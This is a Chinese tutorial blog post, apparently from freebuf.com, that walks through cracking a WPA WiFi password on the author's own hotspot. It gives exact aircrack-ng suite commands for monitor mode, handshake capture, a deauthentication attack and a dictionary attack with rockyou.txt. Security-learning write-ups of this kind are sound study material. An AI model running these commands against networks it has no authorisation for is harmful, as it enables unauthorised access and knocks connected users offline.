WiFi无线攻防-破解密码小实例笔记 – 作者:zcczcc

无线网络，是指无需布线就能实现各种通信设备互联的网络。无线网络技术涵盖的范围很广，既包括允许用户建立远距离无线连接的全球语音和数据网络，也包括为近距离无线连接进行优化的红外线及射频技术。根据网络覆盖范围的不同，可以将无线网络划分为无线广域网(WWAN：Wireless Wide Area Network)、无线局域网(WLAN：Wireless Local Area Network)、无线城域网(WMAN：Wireless Metropolitan Area Network)和无线个人局域网(WPAN：Wireless Personal Area Network)。–>来自百度百科

准备阶段-插入网卡后，选择添加到虚拟机，iwconfig可以看到多出一个wlan 0网卡；

激活网卡

airmon-ng start wlan0  

这个时候iwconfig可以看见已经激活

探测阶段-利用网卡搜索周围能获取到WiFi的信息，这里以及下面的所有抓包阶段都是按两次q退出，不要强制退出。

airodump-ng wlan0mon

抓包阶段-利用airodump

这里选择了我的热点，这里需要注意的是我们设置保存的文件名是zcc，但是生成的文件却不是zcc.ivs，而是zcc-01.ivs。

airodump-ng --ivs --bssid D6:D0:40:0B:72:7E -w zcc -c 8 wlan0mon

其中2C:DB:07:84:9A:6D是我的本机，他链接到了D6:D0:40:0B:72:7E这个网络内。

这里也可以抓取CAP包，可以看见他生成了好几个文件，其中有CAP包：

airodump-ng -c 8 -w /root/Desktop/ --bssid D6:D0:40:0B:72:7E wlan0mon

攻击阶段-aireplay（谨记：开新窗口运行）

此处需要新开一个shell

aireplay-ng -0 1 -a D6:D0:40:0B:72:7E -c 2C:DB:07:84:9A:6D wlan0mon

当出现WPA handshake:D6:D0:40:0B:72:7E时，说明抓包完成，获取到了wifi包的加密秘钥（前提条件是有机子连接这个wifi)；

收集阶段-字典攻击CAP（字典收集）

（1）使用kali自带密钥字典：

• cd /usr/share/wordlists/
• gzip -d rockyou.txt.gz

（2）导入本地的密码本

破解阶段-aircrack破解

（1）ivs数据包爆破

aircrack-ng -w password.txt zcc-01.ivs

KEY FOUND！后面中括号中就是WiFi密码。

（2）破解cap包情况

aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap

成功破解！

来源：freebuf.com 2021-06-23 17:36:57 by: zcczcc